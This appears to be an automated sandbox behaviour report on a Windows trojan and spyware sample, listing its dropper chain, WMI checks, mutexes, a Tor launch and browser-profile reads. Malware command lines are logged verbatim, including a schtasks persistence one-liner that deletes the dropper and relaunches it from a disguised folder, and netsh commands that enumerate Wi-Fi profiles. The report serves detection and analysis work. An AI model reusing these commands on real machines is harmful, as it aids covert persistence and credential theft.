Source: D9EC.exe.11.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 5zQ4dC4.exe.1.dr

Static PE information: Section .text

Source: jtfCFDmLdX.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

File created: C:\Users\user\AppData\Local\SystemCache

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@90/99@11/34

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\jtfCFDmLdX.exe

Code function: 0_2_00FC3FEF CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,GetLastError,FormatMessageA,

0_2_00FC3FEF

Source: C:\Users\user\AppData\Local\Temp\C4AD.exe

File opened: C:\Windows\system32\a1ae05e6e8afceb4d0db2fb4fda5fa4442cb7a7730a7b5d72b78528774c9f119AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Source: C:\Users\user\Desktop\jtfCFDmLdX.exe

Code function: 0_2_00FC4FE0 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,FreeResource,SendMessageA,

0_2_00FC4FE0

Source: jtfCFDmLdX.exe	ReversingLabs: Detection: 57%
Source: jtfCFDmLdX.exe	Virustotal: Detection: 72%

Source: C:\Users\user\Desktop\jtfCFDmLdX.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\jtfCFDmLdX.exe C:\Users\user\Desktop\jtfCFDmLdX.exe
Source: C:\Users\user\Desktop\jtfCFDmLdX.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\TE0FN83.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\TE0FN83.exe
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\TE0FN83.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\Tg9kb35.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\Tg9kb35.exe
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\Tg9kb35.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\Tg9kb35.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\TE0FN83.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\5zQ4dC4.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\5zQ4dC4.exe
Source: C:\Users\user\Desktop\jtfCFDmLdX.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\6rR8iy1.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\6rR8iy1.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\7FE0.exe C:\Users\user\AppData\Local\Temp\7FE0.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\8427.exe C:\Users\user\AppData\Local\Temp\8427.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\8F82.exe C:\Users\user\AppData\Local\Temp\8F82.exe
Source: C:\Users\user\AppData\Local\Temp\8F82.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "8F82" /sc MINUTE /tr "C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe" /rl LIMITED /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\8F82.exe" &&START "" "C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe
Source: C:\Users\user\Desktop\jtfCFDmLdX.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\jtfCFDmLdX.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Users\user\Desktop\jtfCFDmLdX.exe	Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\9AED.exe C:\Users\user\AppData\Local\Temp\9AED.exe
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\jtfCFDmLdX.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "8F82" /sc MINUTE /tr "C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe" /rl LIMITED /f
Source: C:\Users\user\Desktop\jtfCFDmLdX.exe	Process created: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe "C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process created: C:\Users\user\AppData\Local\ixas4a6gsv\tor\tor-real.exe C:\Users\user\AppData\Local\ixas4a6gsv\tor\tor-real.exe" -f "C:\Users\user\AppData\Local\ixas4a6gsv\tor\torrc.txt
Source: C:\Users\user\AppData\Local\ixas4a6gsv\tor\tor-real.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\C4AD.exe C:\Users\user\AppData\Local\Temp\C4AD.exe
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show profiles\|findstr /R /C:"[ ]:[ ]
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid \| findstr "SSID BSSID Signal
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\D9EC.exe C:\Users\user\AppData\Local\Temp\D9EC.exe
Source: C:\Users\user\AppData\Local\Temp\D9EC.exe	Process created: C:\Users\user\AppData\Local\Temp\D9EC.exe C:\Users\user\AppData\Local\Temp\D9EC.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\39D.exe C:\Users\user\AppData\Local\Temp\39D.exe
Source: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe	Process created: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Process created: C:\Users\user\AppData\Local\932079.exe "C:\Users\user\AppData\Local\932079.exe"
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe
Source: C:\Users\user\AppData\Local\Temp\39D.exe	Process created: C:\Users\user\AppData\Local\Temp\InstallSetup5.exe "C:\Users\user\AppData\Local\Temp\InstallSetup5.exe"
Source: C:\Users\user\Desktop\jtfCFDmLdX.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\TE0FN83.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\TE0FN83.exe	Jump to behavior
Source: C:\Users\user\Desktop\jtfCFDmLdX.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\6rR8iy1.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\6rR8iy1.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\TE0FN83.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\Tg9kb35.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\Tg9kb35.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\TE0FN83.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\5zQ4dC4.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\5zQ4dC4.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\Tg9kb35.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\Tg9kb35.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\7FE0.exe C:\Users\user\AppData\Local\Temp\7FE0.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\8427.exe C:\Users\user\AppData\Local\Temp\8427.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\8F82.exe C:\Users\user\AppData\Local\Temp\8F82.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\9AED.exe C:\Users\user\AppData\Local\Temp\9AED.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\C4AD.exe C:\Users\user\AppData\Local\Temp\C4AD.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\D9EC.exe C:\Users\user\AppData\Local\Temp\D9EC.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\39D.exe C:\Users\user\AppData\Local\Temp\39D.exe
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\8F82.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "8F82" /sc MINUTE /tr "C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe" /rl LIMITED /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\8F82.exe" &&START "" "C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "8F82" /sc MINUTE /tr "C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe" /rl LIMITED /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe "C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe"
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process created: C:\Users\user\AppData\Local\ixas4a6gsv\tor\tor-real.exe C:\Users\user\AppData\Local\ixas4a6gsv\tor\tor-real.exe" -f "C:\Users\user\AppData\Local\ixas4a6gsv\tor\torrc.txt
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show profiles\|findstr /R /C:"[ ]:[ ]
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid \| findstr "SSID BSSID Signal
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
Source: C:\Users\user\AppData\Local\Temp\D9EC.exe	Process created: C:\Users\user\AppData\Local\Temp\D9EC.exe C:\Users\user\AppData\Local\Temp\D9EC.exe
Source: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe	Process created: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe
Source: C:\Users\user\AppData\Local\Temp\39D.exe	Process created: C:\Users\user\AppData\Local\Temp\InstallSetup5.exe "C:\Users\user\AppData\Local\Temp\InstallSetup5.exe"
Source: C:\Users\user\AppData\Local\Temp\39D.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\39D.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\39D.exe	Process created: unknown unknown

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\jtfCFDmLdX.exe	Code function: 0_2_00FC1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,	0_2_00FC1F90
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\TE0FN83.exe	Code function: 1_2_004C1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,	1_2_004C1F90
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\Tg9kb35.exe	Code function: 2_2_00ED1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,	2_2_00ED1F90

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\7FE0.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\7FE0.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\7FE0.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\7FE0.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\7FE0.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\8427.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\8427.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ProcessorId FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\8427.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\jtfCFDmLdX.exe

File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP

Jump to behavior

Source: C:\Users\user\Desktop\jtfCFDmLdX.exe

Code function: 0_2_00FC597D GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,

0_2_00FC597D

Source: 4ZZ099qJ.exe, 4ZZ099qJ.exe, 00000006.00000002.1667191056.0000000001031000.00000004.00000001.01000000.0000000A.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: 4ZZ099qJ.exe, 00000006.00000002.1667191056.0000000001031000.00000004.00000001.01000000.0000000A.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = sqlite_rename_table(sql, %Q), tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\6rR8iy1.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\7FE0.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\8F82.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\D9EC.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\D9EC.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\39D.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\932079.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll

Source: C:\Windows\explorer.exe

Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6592:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1744:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4336:120:WilError_03
Source: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe	Mutant created: \Sessions\1\BaseNamedObjects\Wrtrrvjms
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Mutant created: \Sessions\1\BaseNamedObjects\5wlq4gg64l
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3264:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5244:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3340:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1284:120:WilError_03
Source: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe	Mutant created: \Sessions\1\BaseNamedObjects\80a0b818d11bbef3110fbe

Source: C:\Users\user\Desktop\jtfCFDmLdX.exe	Command line argument: Kernel32.dll	0_2_00FC2BFB
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\TE0FN83.exe	Command line argument: Kernel32.dll	1_2_004C2BFB
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\Tg9kb35.exe	Command line argument: Kernel32.dll	2_2_00ED2BFB

Source: 4ZZ099qJ.exe

String found in binary or memory: https://www.maxmind.com/en/locate-my-ip-address

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\8427.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

